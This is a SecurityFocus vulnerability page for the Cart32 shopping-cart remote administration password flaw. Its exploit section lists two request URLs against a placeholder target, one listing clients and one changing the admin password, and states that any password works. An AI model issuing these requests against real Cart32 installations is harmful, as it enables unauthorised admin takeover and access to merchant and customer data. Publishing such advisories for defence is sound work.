info
discussion
exploit
solution
references
McMurtrey/Whitaker & Associates Cart32 Remote Administration Password Vulnerability
http://target/scripts/cart32.exe/cart32clientlist
Any password can be used.
http://target/scripts/c32web.exe/ChangeAdminPassword
Privacy Statement
Copyright 2010, SecurityFocus